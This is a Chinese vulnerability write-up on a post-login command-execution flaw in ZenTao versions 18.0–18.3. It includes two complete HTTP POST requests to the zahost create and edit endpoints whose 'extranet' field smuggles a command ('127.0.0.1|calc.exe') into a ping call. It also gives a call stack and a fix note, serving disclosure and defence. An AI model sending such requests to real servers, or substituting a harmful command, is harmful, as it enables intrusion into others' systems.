漏洞简介
禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、 组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整地覆盖了项目管理的核心流程。
禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的 API 可以调用。
禅道后台存在 RCE 漏洞,存在于 V18.0-18.3 之间,经过复现分析,发现漏洞来源于新增加的一个功能模块。
禅道后台命令执行漏洞
环境搭建
源码下载地址 https://www.zentao.net/dl/zentao/18.2/ZenTaoPMS.18.2.php7.2_7.4.zip
利用 phpstudy 来进行环境的搭建
漏洞复现
登录后台后访问添加宿主机
data:image/s3,"s3://crabby-images/a6c77/a6c777435ef1bd82584f05268dfbd862b17a832f" alt="null 5851cf9963804eccb6e57086ddc34b81.jpeg"
data:image/s3,"s3://crabby-images/27888/27888b44284712501691487d7c29271601c9d310" alt="null f14f977a213ae63eb2541ca9da62dc77.jpeg"
POST /index.php?m=zahost&f=create HTTP/1.1
Host: test.test
Content-Length: 131
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/index.php?m=zahost&f=create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; repoBranch=master; lastProduct=1; tab=qa; windowWidth=1440; windowHeight=722
Connection: close
vsoft=kvm&hostType=physical&name=test2&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=1&diskSize=1&desc=&uid=64e46f386d9ea&type=za
data:image/s3,"s3://crabby-images/d4ee4/d4ee4eb3f37a27d194f74c80d83aff46a03ecac2" alt="null 7b47934d8d1e8fa215d9b04585c23d74.jpeg"
漏洞分析
这是禅道新增加的一个功能
data:image/s3,"s3://crabby-images/492f7/492f7f377c247017d0de0c391068bc8b18fa63a8" alt="null 336cd2bf6b2e929f5f8faca01130bca8.jpeg"
data:image/s3,"s3://crabby-images/90d8e/90d8e93fac91fd3833e73cef11e55cad7efa89b6" alt="null 43f136118abfaffe23da1cea9075ba72.jpeg"
module/zahost/control.php#create
data:image/s3,"s3://crabby-images/10b9f/10b9fe6f2a82317bb8cb3f156b1578dd199d8cc0" alt="null 8a36ba4d8090061d191e89f4074d5b07.jpeg"
module/zahost/model.php#create
data:image/s3,"s3://crabby-images/742dd/742dd369f26919297005be49f4ca241fbd324267" alt="null 5060639ce92f65c3afb9a7203e403a46.jpeg"
module/zahost/model.php#checkAddress
data:image/s3,"s3://crabby-images/cc0f5/cc0f53446c5b12cd2cb2ec7fb5adb6537f753af1" alt="null e4cf6de0ac3b5176543fb1192d2bd11b.jpeg"
module/zahost/model.php#ping
data:image/s3,"s3://crabby-images/34cee/34cee8d116401f22464bd2eba5c13bf6522b487b" alt="null c3f41af5ac220911a958d4a71e57cdd6.jpeg"
POST /index.php?m=zahost&f=edit&hostID=1 HTTP/1.1
Host: test.test
Content-Length: 131
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/index.php?m=zahost&f=create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; repoBranch=master; lastProduct=1; tab=qa; windowWidth=1440; windowHeight=722;XDEBUG_SESSION=PHPSTORM
Connection: close
vsoft=kvm&hostType=physical&name=test4&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=1&diskSize=1&desc=&uid=64e46f386d9ea&type=za
这样也是可以触发的
model.php:119, zahostModel-\>ping()
model.php:149, zahostModel-\>checkAddress()
model.php:94, zahostModel-\>update()
control.php:130, zahost-\>edit()
router.class.php:2199, router-\>loadModule()
index.php:74, {main}()
修复建议
更新至最新版本
data:image/s3,"s3://crabby-images/80dfe/80dfe48a6d42228cbb0322d3d60913d0d70e2846" alt="null 17e7b5dc5494bb74ecc5233ec4ec32ae.jpeg"
执行命令时对地址进行了校验
原创稿件征集
征集原创技术文章中,欢迎投递
投稿邮箱:edu@antvsion.com
文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关
通过审核并发布能收获200-800元不等的稿酬。
更多详情,点我查看!
靶场实操,戳“阅读原文”